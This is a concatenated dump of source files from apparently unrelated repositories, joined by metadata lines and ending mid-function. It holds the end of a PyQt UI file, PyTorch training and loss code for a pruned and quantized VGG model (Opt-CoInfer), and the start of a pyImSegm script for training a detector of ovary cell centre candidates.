QtCore.QObject.connect(self.S_edit, QtCore.SIGNAL(_fromUtf8("textChanged(QString)")), self.S_lcd.display)
QtCore.QMetaObject.connectSlotsByName(Qt_CV_MainWindow)
def retranslateUi(self, Qt_CV_MainWindow):
Qt_CV_MainWindow.setWindowTitle(_translate("Qt_CV_MainWindow", "MainWindow", None))
self.label.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">HSV</span></p></body></html>", None))
self.label_2.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">H</span></p></body></html>", None))
self.label_3.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">S</span></p></body></html>", None))
self.label_4.setText(_translate("Qt_CV_MainWindow", "<html><head/><body><p><span style=\" font-size:18pt;\">V</span></p></body></html>", None))
self.exec_button.setText(_translate("Qt_CV_MainWindow", "Execute", None))
self.show_button.setText(_translate("Qt_CV_MainWindow", "Show", None))
self.menuFile.setTitle(_translate("Qt_CV_MainWindow", "File", None))
self.actionQuit.setText(_translate("Qt_CV_MainWindow", "Quit", None))
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
Qt_CV_MainWindow = QtGui.QMainWindow()
ui = Ui_Qt_CV_MainWindow()
ui.setupUi(Qt_CV_MainWindow)
Qt_CV_MainWindow.show()
sys.exit(app.exec_())
``` |
{
"source": "jiuyecao/Opt-CoInfer",
"score": 2
} |
#### File: jiuyecao/Opt-CoInfer/train.py
```python
import importlib
import os
import time
import random
import math
import torch
from torch import multiprocessing
from torchvision import datasets, transforms
from torch.utils.data.distributed import DistributedSampler
import numpy as np
from utils.model_profiling import model_profiling
from utils.transforms import Lighting
from utils.distributed import init_dist, master_only, is_master
from utils.distributed import get_rank, get_world_size
from utils.distributed import dist_all_reduce_tensor
from utils.distributed import master_only_print as print
from utils.distributed import AllReduceDistributedDataParallel, allreduce_grads
from utils.loss_ops import CrossEntropyLossSoft, CrossEntropyLossSmooth
from utils.config import FLAGS
from utils.meters import ScalarMeter, flush_scalar_meters
import argparse
import warnings
def get_model():
"""get model"""
model_lib = importlib.import_module(FLAGS.model)
z_architecture_list=[64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']
vgg_layer_id=[2,5,6,9,12,13,16,19,22,23,26,29,32,33,36,39,42,43]
vgg_id=vgg_layer_id[FLAGS.z_partition_id]
z_architecture_list[FLAGS.z_partition_id]=FLAGS.z_pruning_num
model = model_lib.vgg16_bn(z_architecture_list,vgg_id, FLAGS.z_quantization)
if getattr(FLAGS, 'distributed', False):
gpu_id = init_dist()
if getattr(FLAGS, 'distributed_all_reduce', False):
# seems faster
model_wrapper = AllReduceDistributedDataParallel(model.cuda())
else:
model_wrapper = torch.nn.parallel.DistributedDataParallel(
model.cuda(), [gpu_id], gpu_id)
else:
model_wrapper = torch.nn.DataParallel(model).cuda()
return model, model_wrapper
def data_transforms():
"""get transform of dataset"""
if FLAGS.data_transforms in [
'imagenet1k_basic', 'imagenet1k_inception', 'imagenet1k_mobile']:
if FLAGS.data_transforms == 'imagenet1k_inception':
mean = [0.5, 0.5, 0.5]
std = [0.5, 0.5, 0.5]
crop_scale = 0.08
jitter_param = 0.4
lighting_param = 0.1
elif FLAGS.data_transforms == 'imagenet1k_basic':
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
crop_scale = 0.08
jitter_param = 0.4
lighting_param = 0.1
elif FLAGS.data_transforms == 'imagenet1k_mobile':
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
crop_scale = 0.25
jitter_param = 0.4
lighting_param = 0.1
train_transforms = transforms.Compose([
transforms.RandomResizedCrop(224, scale=(crop_scale, 1.0)),
transforms.ColorJitter(
brightness=jitter_param, contrast=jitter_param,
saturation=jitter_param),
Lighting(lighting_param),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=mean, std=std),
])
val_transforms = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=mean, std=std),
])
test_transforms = val_transforms
else:
try:
transforms_lib = importlib.import_module(FLAGS.data_transforms)
return transforms_lib.data_transforms()
except ImportError:
raise NotImplementedError(
'Data transform {} is not yet implemented.'.format(
FLAGS.data_transforms))
return train_transforms, val_transforms, test_transforms
def dataset(train_transforms, val_transforms, test_transforms):
"""get dataset for classification"""
if FLAGS.dataset == 'imagenet1k':
if not FLAGS.test_only:
train_set = datasets.ImageFolder(
os.path.join(FLAGS.dataset_dir, 'train'),
transform=train_transforms)
else:
train_set = None
val_set = datasets.ImageFolder(
os.path.join(FLAGS.dataset_dir, 'val'),
transform=val_transforms)
test_set = None
else:
try:
dataset_lib = importlib.import_module(FLAGS.dataset)
return dataset_lib.dataset(
train_transforms, val_transforms, test_transforms)
except ImportError:
raise NotImplementedError(
'Dataset {} is not yet implemented.'.format(FLAGS.dataset_dir))
return train_set, val_set, test_set
def data_loader(train_set, val_set, test_set):
"""get data loader"""
train_loader = None
val_loader = None
test_loader = None
# infer batch size
if getattr(FLAGS, 'batch_size', False):
if getattr(FLAGS, 'batch_size_per_gpu', False):
assert FLAGS.batch_size == (
FLAGS.batch_size_per_gpu * FLAGS.num_gpus_per_job)
else:
assert FLAGS.batch_size % FLAGS.num_gpus_per_job == 0
FLAGS.batch_size_per_gpu = (
FLAGS.batch_size // FLAGS.num_gpus_per_job)
elif getattr(FLAGS, 'batch_size_per_gpu', False):
FLAGS.batch_size = FLAGS.batch_size_per_gpu * FLAGS.num_gpus_per_job
else:
raise ValueError('batch size (per gpu) is not defined')
batch_size = int(FLAGS.batch_size/get_world_size())
if FLAGS.data_loader == 'imagenet1k_basic':
if getattr(FLAGS, 'distributed', False):
if FLAGS.test_only:
train_sampler = None
else:
train_sampler = DistributedSampler(train_set)
val_sampler = DistributedSampler(val_set)
else:
train_sampler = None
val_sampler = None
if not FLAGS.test_only:
train_loader = torch.utils.data.DataLoader(
train_set,
batch_size=batch_size,
shuffle=(train_sampler is None),
sampler=train_sampler,
pin_memory=True,
num_workers=FLAGS.data_loader_workers,
drop_last=getattr(FLAGS, 'drop_last', False))
val_loader = torch.utils.data.DataLoader(
val_set,
batch_size=batch_size,
shuffle=False,
sampler=val_sampler,
pin_memory=True,
num_workers=FLAGS.data_loader_workers,
drop_last=getattr(FLAGS, 'drop_last', False))
test_loader = val_loader
else:
try:
data_loader_lib = importlib.import_module(FLAGS.data_loader)
return data_loader_lib.data_loader(train_set, val_set, test_set)
except ImportError:
raise NotImplementedError(
'Data loader {} is not yet implemented.'.format(
FLAGS.data_loader))
if train_loader is not None:
FLAGS.data_size_train = len(train_loader.dataset)
if val_loader is not None:
FLAGS.data_size_val = len(val_loader.dataset)
if test_loader is not None:
FLAGS.data_size_test = len(test_loader.dataset)
return train_loader, val_loader, test_loader
def get_lr_scheduler(optimizer):
"""get learning rate"""
warmup_epochs = getattr(FLAGS, 'lr_warmup_epochs', 0)
if FLAGS.lr_scheduler == 'multistep':
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(
optimizer, milestones=FLAGS.multistep_lr_milestones,
gamma=FLAGS.multistep_lr_gamma)
elif FLAGS.lr_scheduler == 'exp_decaying':
lr_dict = {}
for i in range(FLAGS.num_epochs):
if i == 0:
lr_dict[i] = 1
else:
lr_dict[i] = lr_dict[i-1] * FLAGS.exp_decaying_lr_gamma
lr_lambda = lambda epoch: lr_dict[epoch]
lr_scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lr_lambda)
elif FLAGS.lr_scheduler == 'linear_decaying':
num_epochs = FLAGS.num_epochs - warmup_epochs
lr_dict = {}
for i in range(FLAGS.num_epochs):
lr_dict[i] = 1. - (i - warmup_epochs) / num_epochs
lr_lambda = lambda epoch: lr_dict[epoch]
lr_scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lr_lambda)
elif FLAGS.lr_scheduler == 'cosine_decaying':
num_epochs = FLAGS.num_epochs - warmup_epochs
lr_dict = {}
for i in range(FLAGS.num_epochs):
lr_dict[i] = (
1. + math.cos(
math.pi * (i - warmup_epochs) / num_epochs)) / 2.
lr_lambda = lambda epoch: lr_dict[epoch]
lr_scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lr_lambda)
else:
try:
lr_scheduler_lib = importlib.import_module(FLAGS.lr_scheduler)
return lr_scheduler_lib.get_lr_scheduler(optimizer)
except ImportError:
raise NotImplementedError(
'Learning rate scheduler {} is not yet implemented.'.format(
FLAGS.lr_scheduler))
return lr_scheduler
def get_optimizer(model):
"""get optimizer"""
if FLAGS.optimizer == 'sgd':
# all depthwise convolution (N, 1, x, x) has no weight decay
# weight decay only on normal conv and fc
model_params = []
for params in model.parameters():
ps = list(params.size())
if len(ps) == 4 and ps[1] != 1:
weight_decay = FLAGS.weight_decay
elif len(ps) == 2:
weight_decay = FLAGS.weight_decay
else:
weight_decay = 0
item = {'params': params, 'weight_decay': weight_decay,
'lr': FLAGS.lr, 'momentum': FLAGS.momentum,
'nesterov': FLAGS.nesterov}
model_params.append(item)
optimizer = torch.optim.SGD(model_params)
else:
try:
optimizer_lib = importlib.import_module(FLAGS.optimizer)
return optimizer_lib.get_optimizer(model)
except ImportError:
raise NotImplementedError(
'Optimizer {} is not yet implemented.'.format(FLAGS.optimizer))
return optimizer
def set_random_seed(seed=None):
"""set random seed"""
if seed is None:
seed = getattr(FLAGS, 'random_seed', 0)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
@master_only
def get_meters(phase):
"""util function for meters"""
def get_single_meter(phase, suffix=''):
meters = {}
meters['loss'] = ScalarMeter('{}_loss/{}'.format(phase, suffix))
for k in FLAGS.topk:
meters['top{}_error'.format(k)] = ScalarMeter(
'{}_top{}_error/{}'.format(phase, k, suffix))
if phase == 'train':
meters['lr'] = ScalarMeter('learning_rate')
return meters
assert phase in ['train', 'val', 'test', 'cal'], 'Invalid phase.'
meters = {}
for width_mult in FLAGS.width_mult_list:
meters[str(width_mult)] = get_single_meter(phase, str(width_mult))
if phase == 'val':
meters['best_val'] = ScalarMeter('best_val')
return meters
@master_only
def profiling(model, use_cuda):
"""profiling on either gpu or cpu"""
print('Start model profiling, use_cuda: {}.'.format(use_cuda))
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
model.apply(
lambda m: setattr(m, 'width_mult', width_mult))
print('Model profiling with width mult {}x:'.format(width_mult))
flops, params = model_profiling(
model, FLAGS.image_size, FLAGS.image_size, use_cuda=use_cuda,
verbose=getattr(FLAGS, 'profiling_verbose', False))
return flops, params
def lr_schedule_per_iteration(optimizer, epoch, batch_idx=0):
""" function for learning rate scheuling per iteration """
warmup_epochs = getattr(FLAGS, 'lr_warmup_epochs', 0)
num_epochs = FLAGS.num_epochs - warmup_epochs
iters_per_epoch = FLAGS.data_size_train / FLAGS.batch_size
current_iter = epoch * iters_per_epoch + batch_idx + 1
if getattr(FLAGS, 'lr_warmup', False) and epoch < warmup_epochs:
linear_decaying_per_step = FLAGS.lr/warmup_epochs/iters_per_epoch
for param_group in optimizer.param_groups:
param_group['lr'] = current_iter * linear_decaying_per_step
elif FLAGS.lr_scheduler == 'linear_decaying':
linear_decaying_per_step = FLAGS.lr/num_epochs/iters_per_epoch
for param_group in optimizer.param_groups:
param_group['lr'] -= linear_decaying_per_step
elif FLAGS.lr_scheduler == 'cosine_decaying':
mult = (
1. + math.cos(
math.pi * (current_iter - warmup_epochs * iters_per_epoch)
/ num_epochs / iters_per_epoch)) / 2.
for param_group in optimizer.param_groups:
param_group['lr'] = FLAGS.lr * mult
else:
pass
def forward_loss(
model, criterion, input, target, meter, soft_target=None,
soft_criterion=None, return_soft_target=False, return_acc=False):
"""forward model and return loss"""
output = model(input)
if soft_target is not None:
loss = torch.mean(soft_criterion(output, soft_target))
else:
loss = torch.mean(criterion(output, target))
# topk
_, pred = output.topk(max(FLAGS.topk))
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
correct_k = []
for k in FLAGS.topk:
correct_k.append(correct[:k].float().sum(0))
tensor = torch.cat([loss.view(1)] + correct_k, dim=0)
# allreduce
tensor = dist_all_reduce_tensor(tensor)
# cache to meter
tensor = tensor.cpu().detach().numpy()
    # per-GPU batch size recovered from the gathered tensor;
    # assumes FLAGS.topk holds two entries (e.g. top-1 and top-5)
    bs = (tensor.size - 1) // 2
for i, k in enumerate(FLAGS.topk):
error_list = list(1.-tensor[1+i*bs:1+(i+1)*bs])
if return_acc and k == 1:
top1_error = sum(error_list) / len(error_list)
return loss, top1_error
if meter is not None:
meter['top{}_error'.format(k)].cache_list(error_list)
if meter is not None:
meter['loss'].cache(tensor[0])
if return_soft_target:
return loss, torch.nn.functional.softmax(output, dim=1)
return loss
def run_one_epoch(
epoch, loader, model, criterion, optimizer, meters, phase='train',
soft_criterion=None):
"""run one epoch for train/val/test/cal"""
t_start = time.time()
assert phase in ['train', 'val', 'test', 'cal'], 'Invalid phase.'
train = phase == 'train'
if train:
model.train()
else:
model.eval()
if phase == 'cal':
model.apply(bn_calibration_init)
if getattr(FLAGS, 'distributed', False):
loader.sampler.set_epoch(epoch)
for batch_idx, (input, target) in enumerate(loader):
if phase == 'cal':
if batch_idx == getattr(FLAGS, 'bn_cal_batch_num', -1):
break
target = target.cuda(non_blocking=True)
if train:
# change learning rate if necessary
lr_schedule_per_iteration(optimizer, epoch, batch_idx)
optimizer.zero_grad()
widths_train = FLAGS.width_mult_list
for width_mult in widths_train:
model.apply(
lambda m: setattr(m, 'width_mult', width_mult))
meter = meters[str(width_mult)]
loss = forward_loss(
model, criterion, input, target, meter)
loss.backward()
if (getattr(FLAGS, 'distributed', False)
and getattr(FLAGS, 'distributed_all_reduce', False)):
allreduce_grads(model)
optimizer.step()
if is_master():
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
meter = meters[str(width_mult)]
meter['lr'].cache(optimizer.param_groups[0]['lr'])
else:
pass
else:
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
model.apply(
lambda m: setattr(m, 'width_mult', width_mult))
if is_master():
meter = meters[str(width_mult)]
else:
meter = None
forward_loss(model, criterion, input, target, meter)
if is_master():
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
results = flush_scalar_meters(meters[str(width_mult)])
# print('{:.1f}s\t{}\t{}\t{}/{}: '.format(
# time.time() - t_start, phase, str(width_mult), epoch,
# FLAGS.num_epochs) + ', '.join(
# '{}: {:.3f}'.format(k, v) for k, v in results.items()))
# elif is_master():
# results = flush_scalar_meters(meters)
# print(
# '{:.1f}s\t{}\t{}/{}: '.format(
# time.time() - t_start, phase, epoch, FLAGS.num_epochs) +
# ', '.join('{}: {:.3f}'.format(k, v) for k, v in results.items()))
else:
results = None
return results
def train_val_test():
"""train and val"""
torch.backends.cudnn.benchmark = True
# seed
set_random_seed()
# model
model, model_wrapper = get_model()
if getattr(FLAGS, 'label_smoothing', 0):
criterion = CrossEntropyLossSmooth(reduction='none')
else:
criterion = torch.nn.CrossEntropyLoss(reduction='none')
if getattr(FLAGS, 'inplace_distill', True):
soft_criterion = CrossEntropyLossSoft(reduction='none')
else:
soft_criterion = None
# check pretrained
if getattr(FLAGS, 'pretrained', False):
checkpoint = torch.load(
FLAGS.pretrained, map_location=lambda storage, loc: storage)
# update keys from external models
if type(checkpoint) == dict and 'model' in checkpoint:
checkpoint = checkpoint['model']
model_wrapper.load_state_dict(checkpoint)
print('Loaded model {}.'.format(FLAGS.pretrained))
optimizer = get_optimizer(model_wrapper)
# check resume training
if os.path.exists(os.path.join(FLAGS.log_dir, 'latest_checkpoint.pt')):
checkpoint = torch.load(
os.path.join(FLAGS.log_dir, 'latest_checkpoint.pt'),
map_location=lambda storage, loc: storage)
model_wrapper.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
last_epoch = checkpoint['last_epoch']
lr_scheduler = get_lr_scheduler(optimizer)
lr_scheduler.last_epoch = last_epoch
best_val = checkpoint['best_val']
train_meters, val_meters = checkpoint['meters']
# print('Loaded checkpoint {} at epoch {}.'.format(
# FLAGS.log_dir, last_epoch))
else:
lr_scheduler = get_lr_scheduler(optimizer)
last_epoch = lr_scheduler.last_epoch
best_val = 1.
train_meters = get_meters('train')
val_meters = get_meters('val')
# if start from scratch, print model and do profiling
#print(model_wrapper)
# data
train_transforms, val_transforms, test_transforms = data_transforms()
train_set, val_set, test_set = dataset(
train_transforms, val_transforms, test_transforms)
train_loader, val_loader, test_loader = data_loader(
train_set, val_set, test_set)
if getattr(FLAGS, 'test_only', False) and (test_loader is not None):
print('Start testing.')
# model_wrapper.load_state_dict(torch.load('logs/1.pth'))
test_meters = get_meters('test')
with torch.no_grad():
for width_mult in sorted(FLAGS.width_mult_list, reverse=True):
model_wrapper.apply(
lambda m: setattr(m, 'width_mult', width_mult))
run_one_epoch(
last_epoch, test_loader, model_wrapper, criterion,
optimizer, test_meters, phase='test')
return
if getattr(FLAGS, 'nonuniform_diff_seed', False):
set_random_seed(getattr(FLAGS, 'random_seed', 0) + get_rank())
# print('Start training.')
for epoch in range(last_epoch+1, FLAGS.num_epochs):
if getattr(FLAGS, 'skip_training', False):
print('Skip training at epoch: {}'.format(epoch))
break
lr_scheduler.step()
# train
results = run_one_epoch(
epoch, train_loader, model_wrapper, criterion, optimizer,
train_meters, phase='train', soft_criterion=soft_criterion)
# val
if val_meters is not None:
val_meters['best_val'].cache(best_val)
        # only run validation in the last 40% of training
        if epoch > 0.6 * FLAGS.num_epochs:
with torch.no_grad():
results = run_one_epoch(
epoch, val_loader, model_wrapper, criterion, optimizer,
val_meters, phase='val')
if is_master() and results['top1_error'] < best_val:
best_val = results['top1_error']
torch.save(
{
'model': model_wrapper.state_dict(),
},
os.path.join(FLAGS.log_dir, 'best_model.pt'))
print('New best validation top1 error: {:.3f}'.format(best_val))
# save latest checkpoint
# if is_master():
# torch.save(
# {
# 'model': model_wrapper.state_dict(),
# 'optimizer': optimizer.state_dict(),
# 'last_epoch': epoch,
# 'best_val': best_val,
# 'meters': (train_meters, val_meters),
# },
# os.path.join(FLAGS.log_dir, 'latest_checkpoint.pt'))
        # append the best validation error so far for this
        # (partition, pruning, quantization) configuration
        with open(FLAGS.data_base_address, 'a') as f:
            partition_ids = [0, 1, 3, 4, 6, 7, 8, 10, 11, 12, 14, 15, 16]
            f.write('{:.0f}+{:.0f}-{:.0f}*{:.3f} \n'.format(
                partition_ids.index(FLAGS.z_partition_id), FLAGS.z_pruning_num,
                FLAGS.z_quantization, best_val))
return
def init_multiprocessing():
# print(multiprocessing.get_start_method())
try:
multiprocessing.set_start_method('fork')
except RuntimeError:
pass
def main():
"""train and eval model"""
os.environ["CUDA_VISIBLE_DEVICES"] = str(FLAGS.gpu)
warnings.filterwarnings('ignore')
init_multiprocessing()
train_val_test()
if __name__ == "__main__":
main()
```
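A minimal sketch of the per-epoch multiplier table built by the `cosine_decaying` branch of `get_lr_scheduler` above; the epoch counts and base learning rate are made-up values, not taken from the Opt-CoInfer FLAGS.
```python
import math

# Illustrative values only (assumptions, not the repo's FLAGS defaults).
num_epochs, warmup_epochs, base_lr = 100, 5, 0.1
effective_epochs = num_epochs - warmup_epochs

# Same table as the 'cosine_decaying' branch: half a cosine period from ~1.0 to ~0.0.
lr_table = {
    epoch: (1. + math.cos(math.pi * (epoch - warmup_epochs) / effective_epochs)) / 2.
    for epoch in range(num_epochs)
}

for epoch in (0, warmup_epochs, num_epochs // 2, num_epochs - 1):
    print('epoch %3d -> lr %.5f' % (epoch, base_lr * lr_table[epoch]))
```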
#### File: Opt-CoInfer/utils/loss_ops.py
```python
import torch
from utils.config import FLAGS
class CrossEntropyLossSoft(torch.nn.modules.loss._Loss):
""" inplace distillation for image classification """
def forward(self, output, target):
output_log_prob = torch.nn.functional.log_softmax(output, dim=1)
target = target.unsqueeze(1)
output_log_prob = output_log_prob.unsqueeze(2)
cross_entropy_loss = -torch.bmm(target, output_log_prob)
return cross_entropy_loss
class CrossEntropyLossSmooth(torch.nn.modules.loss._Loss):
""" label smooth """
def forward(self, output, target):
eps = FLAGS.label_smoothing
n_class = output.size(1)
one_hot = torch.zeros_like(output).scatter(1, target.view(-1, 1), 1)
target = one_hot * (1 - eps) + (1 - one_hot) * eps / (n_class - 1)
output_log_prob = torch.nn.functional.log_softmax(output, dim=1)
target = target.unsqueeze(1)
output_log_prob = output_log_prob.unsqueeze(2)
cross_entropy_loss = -torch.bmm(target, output_log_prob)
return cross_entropy_loss
```
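A standalone sketch of what `CrossEntropyLossSoft` computes during inplace distillation; the tensor shapes and random logits below are assumptions for illustration only.
```python
import torch
import torch.nn.functional as F

# Assumed shapes only: a batch of 4 samples over 10 classes.
torch.manual_seed(0)
student_logits = torch.randn(4, 10)
teacher_logits = torch.randn(4, 10)

# Soft target = teacher softmax (the full-width model output in inplace distillation).
soft_target = F.softmax(teacher_logits, dim=1)

# Same computation as CrossEntropyLossSoft.forward: -sum_k p_k * log q_k per sample,
# written as a batched matrix product of (N, 1, C) x (N, C, 1).
log_prob = F.log_softmax(student_logits, dim=1)
loss_per_sample = -torch.bmm(soft_target.unsqueeze(1), log_prob.unsqueeze(2))
print(loss_per_sample.view(-1))   # one loss value per sample
print(loss_per_sample.mean())     # what torch.mean(...) reduces it to upstream
```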
#### File: Opt-CoInfer/utils/transforms.py
```python
import numpy as np
from PIL import Image
imagenet_pca = {
'eigval': np.asarray([0.2175, 0.0188, 0.0045]),
'eigvec': np.asarray([
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
])
}
class Lighting(object):
    """ AlexNet-style PCA-based colour jitter (lighting noise) """
def __init__(self, alphastd,
eigval=imagenet_pca['eigval'],
eigvec=imagenet_pca['eigvec']):
self.alphastd = alphastd
assert eigval.shape == (3,)
assert eigvec.shape == (3, 3)
self.eigval = eigval
self.eigvec = eigvec
def __call__(self, img):
if self.alphastd == 0.:
return img
rnd = np.random.randn(3) * self.alphastd
rnd = rnd.astype('float32')
v = rnd
old_dtype = np.asarray(img).dtype
v = v * self.eigval
v = v.reshape((3, 1))
inc = np.dot(self.eigvec, v).reshape((3,))
img = np.add(img, inc)
if old_dtype == np.uint8:
img = np.clip(img, 0, 255)
img = Image.fromarray(img.astype(old_dtype), 'RGB')
return img
def __repr__(self):
return self.__class__.__name__ + '()'
``` |
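A usage sketch for the `Lighting` transform defined above; the import path, the `alphastd` value and the random test image are assumptions.
```python
import numpy as np
from PIL import Image

from utils.transforms import Lighting  # import path assumed from the repo layout above

# Random uint8 RGB image purely for illustration.
rng = np.random.RandomState(0)
dummy = Image.fromarray(rng.randint(0, 255, size=(64, 64, 3), dtype=np.uint8), 'RGB')

jitter = Lighting(alphastd=0.1)  # 0.1 is an assumed jitter strength
jittered = jitter(dummy)
print(type(jittered), np.asarray(jittered).dtype)  # still a uint8 PIL image
```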
{
"source": "jiuyueshiwo/pyImSegm",
"score": 3
} |
#### File: pyImSegm/experiments_ovary_centres/run_center_candidate_training.py
```python
import os
import sys
import logging
import argparse
from functools import partial
import tqdm
import pandas as pd
import numpy as np
from scipy import spatial
import matplotlib
if os.environ.get('DISPLAY', '') == '' and matplotlib.rcParams['backend'] != 'agg':
print('No display found. Using non-interactive Agg backend.')
matplotlib.use('Agg')
import matplotlib.pyplot as plt
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.utilities.experiments as tl_expt
import imsegm.utilities.drawing as tl_visu
import imsegm.superpixels as seg_spx
import imsegm.descriptors as seg_fts
import imsegm.classification as seg_clf
import imsegm.labeling as seg_lbs
# whether to skip loading the triplets CSV from a previous run (and rebuild it)
FORCE_RELOAD = False
# even if data was dumped in a previous run, everything will be recomputed
FORCE_RECOMP_DATA = False
EXPORT_TRAINING_DATA = True
# perform the Leave-One-Out experiment
RUN_LEAVE_ONE_OUT = True
# Set experiment folders
FOLDER_EXPERIMENT = 'detect-centers-train_%s'
FOLDER_INPUT = 'inputs_annot'
FOLDER_POINTS = 'candidates'
FOLDER_POINTS_VISU = 'candidates_visul'
FOLDER_POINTS_TRAIN = 'points_train'
LIST_SUBDIRS = [FOLDER_INPUT, FOLDER_POINTS,
FOLDER_POINTS_VISU, FOLDER_POINTS_TRAIN]
NAME_CSV_TRIPLES = 'list_images_segms_centers.csv'
NAME_CSV_STAT_TRAIN = 'statistic_train_centers.csv'
NAME_YAML_PARAMS = 'configuration.yaml'
NAME_DUMP_TRAIN_DATA = 'dump_training_data.npz'
NB_WORKERS = tl_expt.nb_workers(0.9)
# index is the label in the loaded segmentation, value is the output label
LUT_ANNOT_CENTER_RELABEL = [0, 0, -1, 1]
CROSS_VAL_LEAVE_OUT_SEARCH = 0.2
CROSS_VAL_LEAVE_OUT_EVAL = 0.1
CENTER_PARAMS = {
'computer': os.uname(),
'slic_size': 25,
'slic_regul': 0.3,
# 'fts_hist_diams': None,
# 'fts_hist_diams': [10, 25, 50, 75, 100, 150, 200, 250, 300],
'fts_hist_diams': [10, 50, 100, 200, 300],
# 'fts_ray_step': None,
'fts_ray_step': 15,
'fts_ray_types': [('up', [0])],
# 'fts_ray_types': [('up', [0]), ('down', [1])],
'fts_ray_closer': True,
'fts_ray_smooth': 0,
'pca_coef': None,
# 'pca_coef': 0.99,
'balance': 'unique',
'classif': 'RandForest',
# 'classif': 'SVM',
'nb_classif_search': 50,
'dict_relabel': None,
# 'dict_relabel': {0: [0], 1: [1], 2: [2, 3]},
    'center_dist_thr': 50,  # max distance from an annotated center to label a point as positive
}
PATH_IMAGES = os.path.join(tl_data.update_path('data_images'),
'drosophila_ovary_slice')
PATH_RESULTS = tl_data.update_path('results', absolute=True)
CENTER_PARAMS.update({
'path_list': os.path.join(PATH_IMAGES,
'list_imgs-segm-center-levels_short.csv'),
'path_images': '',
'path_segms': '',
'path_centers': '',
# 'path_images': os.path.join(PATH_IMAGES, 'image', '*.jpg'),
# 'path_segms': os.path.join(PATH_IMAGES, 'segm', '*.png'),
# 'path_centers': os.path.join(PATH_IMAGES, 'center_levels', '*.png'),
'path_infofile': '',
'path_output': PATH_RESULTS,
'name': 'ovary',
})
def arg_parse_params(params):
"""
SEE: https://docs.python.org/3/library/argparse.html
:return dict:
"""
parser = argparse.ArgumentParser()
parser.add_argument('-list', '--path_list', type=str, required=False,
help='path to the list of input files',
default=params['path_list'])
parser.add_argument('-imgs', '--path_images', type=str, required=False,
help='path to directory & name pattern for images',
default=params['path_images'])
parser.add_argument('-segs', '--path_segms', type=str, required=False,
help='path to directory & name pattern for segmentation',
default=params['path_segms'])
parser.add_argument('-centers', '--path_centers', type=str, required=False,
help='path to directory & name pattern for centres',
default=params['path_centers'])
parser.add_argument('-info', '--path_infofile', type=str, required=False,
help='path to the global information file',
default=params['path_infofile'])
parser.add_argument('-out', '--path_output', type=str, required=False,
help='path to the output directory',
default=params['path_output'])
parser.add_argument('-n', '--name', type=str, required=False,
help='name of the experiment', default='ovary')
parser.add_argument('-cfg', '--path_config', type=str, required=False,
help='path to the configuration', default=None)
parser.add_argument('--nb_workers', type=int, required=False, default=NB_WORKERS,
help='number of processes in parallel')
params.update(vars(parser.parse_args()))
paths = {}
for k in (k for k in params if 'path' in k):
if not isinstance(params[k], str) or params[k].lower() == 'none':
paths[k] = ''
continue
if k in ['path_images', 'path_segms', 'path_centers', 'path_expt']:
p_dir = tl_data.update_path(os.path.dirname(params[k]))
paths[k] = os.path.join(p_dir, os.path.basename(params[k]))
else:
paths[k] = tl_data.update_path(params[k], absolute=True)
p_dir = paths[k]
assert os.path.exists(p_dir), 'missing (%s) %s' % (k, p_dir)
# load saved configuration
if params['path_config'] is not None:
ext = os.path.splitext(params['path_config'])[-1]
assert (ext == '.yaml' or ext == '.yml'), \
'wrong extension for %s' % params['path_config']
data = tl_expt.load_config_yaml(params['path_config'])
params.update(data)
params.update(paths)
logging.info('ARG PARAMETERS: \n %r', params)
return params
def is_drawing(path_out):
""" check if the out folder exist and also if the process is in debug mode
:param str path_out:
:return bool:
# """
bool_res = path_out is not None and os.path.exists(path_out) \
and logging.getLogger().isEnabledFor(logging.DEBUG)
return bool_res
def find_match_images_segms_centers(path_pattern_imgs, path_pattern_segms,
path_pattern_center=None):
""" walk over dir with images and segmentation and pair those with the same
name and if the folder with centers exists also add to each par a center
.. note:: returns just paths
:param str path_pattern_imgs:
:param str path_pattern_segms:
:param str path_pattern_center:
:return DF: DF<path_img, path_segm, path_center>
"""
logging.info('find match images-segms-centres...')
list_paths = [path_pattern_imgs, path_pattern_segms, path_pattern_center]
df_paths = tl_data.find_files_match_names_across_dirs(list_paths)
if not path_pattern_center:
df_paths.columns = ['path_image', 'path_segm']
df_paths['path_centers'] = ''
else:
df_paths.columns = ['path_image', 'path_segm', 'path_centers']
df_paths.index = range(1, len(df_paths) + 1)
return df_paths
def get_idx_name(idx, path_img):
""" create string identifier for particular image
:param int idx: image index
:param str path_img: image path
:return str: identifier
"""
im_name = os.path.splitext(os.path.basename(path_img))[0]
if idx is not None:
return '%03d_%s' % (idx, im_name)
else:
return im_name
def load_image_segm_center(idx_row, path_out=None, dict_relabel=None):
""" by paths load images and segmentation and weather centers exist,
load them if the path out is given redraw visualisation of inputs
:param (int, DF:row) idx_row: tuple of index and row
:param str path_out: path to output directory
:param dict dict_relabel: look-up table for relabeling
:return(str, ndarray, ndarray, [[int, int]]): idx_name, img_rgb, segm, centers
"""
idx, row_path = idx_row
for k in ['path_image', 'path_segm', 'path_centers']:
